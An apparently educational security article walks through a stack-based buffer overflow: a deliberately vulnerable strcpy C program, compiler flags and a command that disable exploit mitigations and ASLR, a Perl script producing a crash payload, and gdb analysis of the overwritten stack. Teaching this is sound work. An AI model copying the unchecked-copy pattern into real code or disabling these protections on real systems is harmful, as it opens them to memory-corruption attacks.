How to exploit Buffer Overflow

This article provides an overview of buffer overflow vulnerabilities and how they can be exploited. Buffer overflows are most common in programs written in languages that let code write to memory without automatic bounds checks.

Other programming languages can be affected too, but C and C++ account for most vulnerabilities of this class because they give programs direct, unchecked access to memory. In this article, we’ll explore some of the reasons for buffer overflows and how someone can abuse them to take control of the vulnerable program.

Learn Secure Coding

Build your secure coding skills in C/C++, iOS, Java, .NET, Node.js, PHP and other languages.

Learn More

What is buffer overflow?

Buffer overflow is a class of vulnerability that occurs when a program writes data into a buffer without checking that the data fits, typically through functions that do not perform bounds checking. In simple words, more data is put into a fixed-length buffer than the buffer can hold, and the excess overwrites adjacent memory.

It’s easier to explain with an example, so let’s take the following program.

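#include <stdio.h>
#include <string.h>

void vuln_func(char *input);

int main(int argc, char *argv[])
{
    /* Pass the first command-line argument, if any, to the vulnerable function. */
    if (argc > 1)
        vuln_func(argv[1]);
}

void vuln_func(char *input)
{
    char buffer[256];       /* fixed-size local buffer, stored on the stack */

    strcpy(buffer, input);  /* no bounds check: input longer than 255 characters overflows buffer */
}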

This is a simple C program that is vulnerable to buffer overflow. The main function passes the first command-line argument to vuln_func, which receives it as the parameter input and copies it into buffer, a character array with a length of 256.

However, the copy is performed with the strcpy function, which doesn't perform any bounds checking: it keeps copying until it reaches the terminating null byte of the source string. We can therefore write more than 256 characters into buffer, and a buffer overflow occurs. Because buffer is a local variable, it is stored on the stack, close to the saved return address of vuln_func. If we can overwrite that saved return address, we will be able to control the flow of the entire program. That's the reason why this is called a stack-based buffer overflow.
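To make the missing check concrete, here is a minimal sketch of what a length-checked copy into the same kind of buffer could look like. The helper name copy_bounded and its return convention are assumptions made for illustration; they are not part of the original program or of the C standard library.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not in the original program): copies src into dst
 * only if it fits, including the terminating null byte.
 * Returns 0 on success and -1 if src would not fit in dst. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);

    if (dst_size == 0 || len >= dst_size) {
        return -1;              /* refuse instead of writing past the end */
    }
    memcpy(dst, src, len + 1);  /* len + 1 also copies the null terminator */
    return 0;
}
```

With such a helper, vuln_func could call copy_bounded(buffer, sizeof buffer, input) and would reject any argument of 256 or more characters instead of overflowing.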

Types of buffer overflow

We have just discussed an example of stack-based buffer overflow. However, a buffer overflow is not limited to the stack. The following are some of the common buffer overflow types.

Stack-based buffer overflow

When the buffer being overflowed is stored on the stack, the vulnerability is referred to as a stack-based buffer overflow. As mentioned earlier, a stack-based buffer overflow vulnerability can be exploited by overwriting the return address of a function on the stack.

Heap-based buffer overflow

When the buffer being overflowed is stored in the heap data area, the vulnerability is referred to as a heap-based buffer overflow. Heap overflows are relatively harder to exploit than stack overflows. Successful exploitation relies on various factors, as there is no return address to overwrite as with the stack-based technique. Instead, the user-supplied data often overwrites other data on the heap to manipulate the program in an unexpected manner.
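As a rough illustration of "overwriting data on the heap", the sketch below simulates an unchecked copy into a name field that spills into the flag stored right after it in the same heap allocation. The struct account layout and the function name are hypothetical, and the copy is kept inside the allocated object so the example stays well-defined; a real heap overflow would write past the allocation.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical record: a name buffer followed by a privilege flag. */
struct account {
    char name[16];
    int  is_admin;
};

/* Copies len bytes of input to the start of a zeroed, heap-allocated
 * account, the way a copy with no check against sizeof name would.
 * Returns 1 if is_admin ended up non-zero, 0 if it stayed zero,
 * or -1 on allocation failure or if len exceeds the whole record. */
int is_admin_after_copy(const unsigned char *input, size_t len)
{
    struct account *acct;
    int result;

    if (len > sizeof(struct account)) {
        return -1;                     /* keep the demo inside the allocation */
    }
    acct = calloc(1, sizeof *acct);    /* is_admin starts as 0 */
    if (acct == NULL) {
        return -1;
    }
    memcpy(acct, input, len);          /* bytes beyond 16 land in is_admin */
    result = (acct->is_admin != 0);
    free(acct);
    return result;
}
```

Sixteen bytes of input leave the flag untouched, while twenty bytes of "A" turn it on even though the program never set it.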

Understanding debuggers

Understanding how to use debuggers is a crucial part of exploiting buffer overflows. When writing buffer overflow exploits, we often need to understand the stack layout, memory maps, instruction mnemonics, CPU registers and so on. A debugger lets us inspect all of these while the program runs or after it crashes.

In the Windows environment, OllyDbg and Immunity Debugger are freely available debuggers. GNU Debugger (GDB) is the most commonly used debugger in the Linux environment.

Exploit mitigation techniques

To be able to exploit a buffer overflow vulnerability on a modern operating system, we often need to deal with various exploit mitigation techniques such as stack canaries, data execution prevention, address space layout randomization and more. To keep it simple, let’s proceed with disabling all these protections.

For the purposes of understanding buffer overflow basics, let’s look at a stack-based buffer overflow.

Crashing and analyzing core dumps

In this section, let's explore how one can crash the vulnerable program, which is the first step toward writing an exploit later. The following makefile can be used to compile this program with several compile-time exploit mitigations disabled in the binary.

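all:
	gcc -fno-stack-protector vulnerable.c -o vulnerable -z execstack -D_FORTIFY_SOURCE=0

clean:
	rm vulnerable

We are simply using gcc to compile vulnerable.c into the binary vulnerable. The -fno-stack-protector flag disables stack canaries, -z execstack marks the stack as executable (turning off data execution prevention for it) and -D_FORTIFY_SOURCE=0 disables the fortified variants of functions such as strcpy.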

Let’s disable ASLR by writing the value 0 into the file /proc/sys/kernel/randomize_va_space. This looks like the following:

sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space"
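To confirm which mode is active, the value can simply be read back from the same file. The sketch below is one way to do that in C; the function names are made up for this example, and the descriptions follow the Linux kernel sysctl documentation for randomize_va_space.

```c
#include <stdio.h>

/* Describes a value read from /proc/sys/kernel/randomize_va_space. */
const char *aslr_mode_description(int value)
{
    switch (value) {
    case 0:  return "disabled";
    case 1:  return "partial: stack, mmap base and VDSO randomized";
    case 2:  return "full: partial plus heap (brk) randomized";
    default: return "unknown";
    }
}

/* Reads the setting from the given path. Returns the value, or -1 if the
 * file cannot be opened or parsed (for example on a non-Linux system). */
int read_aslr_setting(const char *path)
{
    int value = -1;
    FILE *f = fopen(path, "r");

    if (f == NULL) {
        return -1;
    }
    if (fscanf(f, "%d", &value) != 1) {
        value = -1;
    }
    fclose(f);
    return value;
}
```

Calling aslr_mode_description(read_aslr_setting("/proc/sys/kernel/randomize_va_space")) should report "disabled" after the command above has been run.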

Now we are fully ready to exploit this vulnerable program.

Let's compile it and produce the executable binary. To do this, run the command make and it should create a new binary for us.

$ make
$

We should have a new binary in the current directory. Let’s run the file command against the binary and observe the details.

$ file vulnerable

vulnerable: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9e7fbfc60186b8adfb5cab10496506bb13ae7b0a, for GNU/Linux 3.2.0, not stripped

As we can see, it's an ELF and 64-bit binary. Let’s run the binary with an argument.

$ ./vulnerable test
$

Nothing happens. This is intentional: the program doesn't do anything apart from taking input and then copying it into another variable using the strcpy function.

Crashing the program

Now let's see how we can crash this application. We're going to create a simple Perl program that we can also use as a template for the rest of the exploit.

Let's create a file called exploit1.pl that stores three hundred "A"s in a variable and prints them. Because 300 characters is more than the 256-byte buffer can hold, we can use this output in our attempt to crash the application.

exploit1.pl

#!/usr/bin/perl
$| = 1;             # disable output buffering
$junk = "A" x 300;  # 300 "A" characters
print $junk;

Let us also ensure that the file has executable permissions.

chmod +x exploit1.pl

Now, let's write the output of this file into a file called payload1.

$ ./exploit1.pl > payload1

Let’s simply run the vulnerable program and pass the contents of payload1 as input to the program.

$ ./vulnerable $(cat payload1)
Segmentation fault (core dumped)

As you can see, there is a segmentation fault and the application crashes. Now let's type ls and check if there are any core dumps available in the current directory.

$ ./vulnerable $(cat payload1)
Segmentation fault (core dumped)
$ ls
exploit1.pl Makefile payload1 vulnerable vulnerable.c

Notice that there is no crash dump in the current directory: the segmentation fault did not create any new files. Let’s enable core dumps so we can understand what caused the segmentation fault.

$ ulimit -c unlimited

This should enable core dumps. Now, let’s crash the application again using the same command that we used earlier. Type ls once again and you should see a new file called core.

$ ./vulnerable $(cat payload1)
Segmentation fault (core dumped)
$ ls
core exploit1.pl Makefile payload1 vulnerable* vulnerable.c
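The ulimit -c unlimited command used above changes the core file size limit of the shell. For reference, a process can adjust the same limit for itself through the POSIX getrlimit and setrlimit calls. The following is only a sketch: the function name enable_core_dumps is an assumption, and unlike the shell command it raises the soft limit only as far as the existing hard limit, so no core file is written if the hard limit is already 0.

```c
#include <sys/resource.h>

/* Raises the soft core-file size limit of the calling process to its
 * hard limit. Child processes started afterwards inherit the new limit.
 * Returns 0 on success and -1 on error. */
int enable_core_dumps(void)
{
    struct rlimit limit;

    if (getrlimit(RLIMIT_CORE, &limit) != 0) {
        return -1;
    }
    limit.rlim_cur = limit.rlim_max;  /* the soft limit may go up to the hard limit */
    return setrlimit(RLIMIT_CORE, &limit);
}
```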

The file named core is a core dump, which captures the state of the program at the time of the crash. We can use this core file to analyze the crash. Let’s see how we can analyze the core file using gdb.

$ gdb -q -core core
GEF for linux ready, type `gef' to start, `gef config' to configure
75 commands loaded for GDB 9.1 using Python engine 3.8
[*] 5 commands could not be loaded, run `gef missing` to know why.
[New LWP 34966]
[!] './vulnerable AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' not found/readable
[!] Failed to get file debug information, most of gef features will not work
Core was generated by `./vulnerable AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x00005555555551ad in ?? ()
gef➤

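If you look at this gdb output, the program stopped at the address 0x00005555555551ad. (RIP is the register that holds the address of the instruction to be executed.) Because the core file was loaded without the binary, gdb cannot show a symbol name for this address.

RIP itself does not contain our As. As the debugger output later in this section shows, 0x00005555555551ad is the ret instruction at the end of vuln_func. The long input overwrote the saved return address on the stack with 0x4141414141414141, which is not a valid address on x86-64, so the processor raised a fault when ret tried to load it into RIP. That's the reason why the application crashed. As I mentioned earlier, we can use this core dump to analyze the crash. We can also type info registers to see what value each register was holding at the time of the crash.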

gef➤ info registers
rax 0x7fffffffdd60 0x7fffffffdd60
rbx 0x5555555551b0 0x5555555551b0
rcx 0x80008 0x80008
rdx 0x414141 0x414141
rsi 0x7fffffffe3e0 0x7fffffffe3e0
rdi 0x7fffffffde89 0x7fffffffde89
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffde68 0x7fffffffde68
r8 0x0 0x0
r9 0x7ffff7fe0d50 0x7ffff7fe0d50
r10 0x0 0x0
r11 0x0 0x0
r12 0x555555555060 0x555555555060
r13 0x7fffffffdf70 0x7fffffffdf70
r14 0x0 0x0
r15 0x0 0x0
rip 0x5555555551ad 0x5555555551ad
eflags 0x10246 [ PF ZF IF RF ]
cs 0x33 0x33
ss 0x2b 0x2b
ds 0x0 0x0
es 0x0 0x0
fs 0x0 0x0
gs 0x0 0x0
gef➤

As the output shows, RIP still points to 0x00005555555551ad, the instruction that faulted, while the RBP register holds 0x4141414141414141, which is 8 of the As from our junk. This confirms that our input overwrote data saved on the stack. This is how core dumps can be used.
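One detail in the register dump deserves a closer look: RIP holds 0x5555555551ad and not 0x4141414141414141. On x86-64, an address is only usable if it is canonical, meaning its upper bits are all copies of bit 47, and ret faults before RIP changes when the address it pops fails that test. The sketch below checks this property for the values seen above. It assumes 48-bit virtual addresses (4-level paging), and the function name is_canonical_48 is made up for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/* Returns true if addr is canonical under 48-bit virtual addressing:
 * bits 63..47 must be either all zeros or all ones. */
bool is_canonical_48(uint64_t addr)
{
    uint64_t upper = addr >> 47;   /* the 17 bits from bit 47 to bit 63 */

    return upper == 0 || upper == UINT64_C(0x1FFFF);
}
```

Under that assumption, 0x00005555555551ad (the ret instruction) and 0x00007fffffffde68 (the stack pointer) pass the check, while 0x4141414141414141 does not, which is why the As show up in RBP and on the stack but never in RIP.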

Let's run the program itself in gdb by typing gdb ./vulnerable and disassemble main using disass main.

gef➤ disass main
Dump of assembler code for function main:
0x0000000000001149 <+0>: endbr64
0x000000000000114d <+4>: push rbp
0x000000000000114e <+5>: mov rbp,rsp
0x0000000000001151 <+8>: sub rsp,0x10
0x0000000000001155 <+12>: mov DWORD PTR [rbp-0x4],edi
0x0000000000001158 <+15>: mov QWORD PTR [rbp-0x10],rsi
0x000000000000115c <+19>: cmp DWORD PTR [rbp-0x4],0x1
0x0000000000001160 <+23>: jle 0x1175 <main+44>
0x0000000000001162 <+25>: mov rax,QWORD PTR [rbp-0x10]
0x0000000000001166 <+29>: add rax,0x8
0x000000000000116a <+33>: mov rax,QWORD PTR [rax]
0x000000000000116d <+36>: mov rdi,rax
0x0000000000001170 <+39>: call 0x117c <vuln_func>
0x0000000000001175 <+44>: mov eax,0x0
0x000000000000117a <+49>: leave
0x000000000000117b <+50>: ret
End of assembler dump.
gef➤

This is the disassembly of our main function. Notice that main calls a function named vuln_func. Let us disassemble that using disass vuln_func.

gef➤ disass vuln_func
Dump of assembler code for function vuln_func:
0x000000000000117c <+0>: endbr64
0x0000000000001180 <+4>: push rbp
0x0000000000001181 <+5>: mov rbp,rsp
0x0000000000001184 <+8>: sub rsp,0x110
0x000000000000118b <+15>: mov QWORD PTR [rbp-0x108],rdi
0x0000000000001192 <+22>: mov rdx,QWORD PTR [rbp-0x108]
0x0000000000001199 <+29>: lea rax,[rbp-0x100]
0x00000000000011a0 <+36>: mov rsi,rdx
0x00000000000011a3 <+39>: mov rdi,rax
0x00000000000011a6 <+42>: call 0x1050 <strcpy@plt>
0x00000000000011ab <+47>: nop
0x00000000000011ac <+48>: leave
0x00000000000011ad <+49>: ret
End of assembler dump.
gef➤

In the disassembly of vuln_func, notice the call to strcpy@plt. Its destination argument, passed in rdi, is the address rbp-0x100, which is where buffer starts.
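The lea rax,[rbp-0x100] instruction in this listing tells us how the stack frame is laid out: buffer starts 0x100 (256) bytes below RBP, the saved RBP occupies the next 8 bytes and the saved return address the 8 bytes after that. The sketch below turns this layout into a small lookup. The names are invented for this example, and the numbers apply only to this particular build of vuln_func.

```c
#include <stddef.h>

/* Layout read from the vuln_func disassembly on x86-64. */
static const size_t BUFFER_BELOW_RBP = 0x100; /* lea rax,[rbp-0x100]: 256 bytes */
static const size_t WORD_SIZE        = 8;     /* saved RBP and return address */

enum frame_slot { IN_BUFFER, SAVED_RBP, RETURN_ADDRESS, BEYOND_FRAME };

/* Classifies where the input byte at the given index lands when the
 * input is copied to the start of buffer with no bounds check. */
enum frame_slot slot_for_input_index(size_t index)
{
    if (index < BUFFER_BELOW_RBP) {
        return IN_BUFFER;
    }
    if (index < BUFFER_BELOW_RBP + WORD_SIZE) {
        return SAVED_RBP;
    }
    if (index < BUFFER_BELOW_RBP + 2 * WORD_SIZE) {
        return RETURN_ADDRESS;
    }
    return BEYOND_FRAME;
}
```

According to this layout, input bytes 0 to 255 stay inside buffer, bytes 256 to 263 replace the saved RBP and bytes 264 to 271 replace the saved return address.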

Now run the program by passing the contents of payload1 as input.

gef➤ r $(cat payload1)

Starting program: /home/dev/x86_64/simple_bof/vulnerable $(cat payload1)

Program received signal SIGSEGV, Segmentation fault.

0x00005555555551ad in vuln_func ()

[ Legend: Modified register | Code | Heap | Stack | String ]

──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────

$rax : 0x00007fffffffdd00 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"

$rbx : 0x00005555555551b0 → <__libc_csu_init+0> endbr64

$rcx : 0x20000

$rdx : 0x11

$rsp : 0x00007fffffffde08 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

$rbp : 0x4141414141414141 ("AAAAAAAA"?)

$rsi : 0x00007fffffffe3a0 → "AAAAAAAAAAAAAAAAA"

$rdi : 0x00007fffffffde1b → "AAAAAAAAAAAAAAAAA"

$rip : 0x00005555555551ad → <vuln_func+49> ret

$r8 : 0x0

$r9 : 0x00007ffff7fe0d50 → endbr64

$r10 : 0x0

$r11 : 0x0

$r12 : 0x0000555555555060 → <_start+0> endbr64

$r13 : 0x00007fffffffdf10 → 0x0000000000000002

$r14 : 0x0

$r15 : 0x0

$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]

$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000

──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────

0x00007fffffffde08│+0x0000: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ← $rsp

0x00007fffffffde10│+0x0008: "AAAAAAAAAAAAAAAAAAAAAAAAAAAA"

0x00007fffffffde18│+0x0010: "AAAAAAAAAAAAAAAAAAAA"

0x00007fffffffde20│+0x0018: "AAAAAAAAAAAA"

0x00007fffffffde28│+0x0020: 0x00007f0041414141 ("AAAA"?)

0x00007fffffffde30│+0x0028: 0x00007ffff7ffc620 → 0x0005042c00000000

0x00007fffffffde38│+0x0030: 0x00007fffffffdf18 → 0x00007fffffffe25a → "/home/dev/x86_64/simple_bof/vulnerable"

0x00007fffffffde40│+0x0038: 0x0000000200000000

────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────

0x5555555551a6 <vuln_func+42> call 0x555555555050 <strcpy@plt>

0x5555555551ab <vuln_func+47> nop

0x5555555551ac <vuln_func+48> leave

→ 0x5555555551ad <vuln_func+49> ret

[!] Cannot disassemble from $PC

────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────

[#0] Id 1, Name: "vulnerable", stopped 0x5555555551ad in vuln_func (), reason: SIGSEGV

──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────

[#0] 0x5555555551ad → vuln_func()

───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

gef➤
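Note that the addresses in this run (for example 0x5555555551ad) differ from those in the static disassembly (0x11ad). The binary appears to be position-independent, so the disassembly shows offsets within the file and the loader adds a base address at run time. The sketch below does that arithmetic; the base 0x555555554000 is an assumption inferred from the two listings, and it is the value typically seen for such binaries on x86-64 Linux when ASLR is disabled.

```c
#include <stdint.h>

/* Assumed load base, inferred by comparing the static and run-time
 * addresses of the same instructions in the listings. */
#define ASSUMED_LOAD_BASE UINT64_C(0x555555554000)

/* Converts an offset from the static disassembly to a run-time address. */
uint64_t runtime_address(uint64_t load_base, uint64_t file_offset)
{
    return load_base + file_offset;
}
```

For instance, runtime_address(ASSUMED_LOAD_BASE, 0x11ad) gives 0x5555555551ad, the address of the ret instruction where the program stopped.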

In the current environment, a GDB extension called GEF is installed. It adds a context view of the registers, stack, code and threads each time the program stops, similar to what a debugger with a GUI would display.

Now if you look at the output, it matches what we have already seen with the core dump: 8 As have overwritten RBP. However, we passed 300 As, and we don't yet know which 8 of them ended up in the RBP register.

When exploiting buffer overflows, being able to crash the application is the first step in the process. Using this knowledge, an attacker will begin to work out the exact offset required to overwrite the saved return address, which is loaded into the RIP register when the function returns, and so control the flow of the program.

Conclusion

In this article, we discussed what buffer overflow vulnerabilities are, their types and how they can be exploited. We also analyzed a vulnerable application to understand how crashing an application generates core dumps, which will in turn be helpful in developing a working exploit. In the next article, we will discuss how we can use this knowledge to exploit a buffer overflow vulnerability.

Posted: August 31, 2020

Srinivas

Srinivas is an Information Security professional with 4 years of industry experience in Web, Mobile and Infrastructure Penetration Testing. He is currently a security researcher at Infosec Institute Inc. He holds the Offensive Security Certified Professional (OSCP) certification. He blogs at www.androidpentesting.com. Email: srini0x00@gmail.com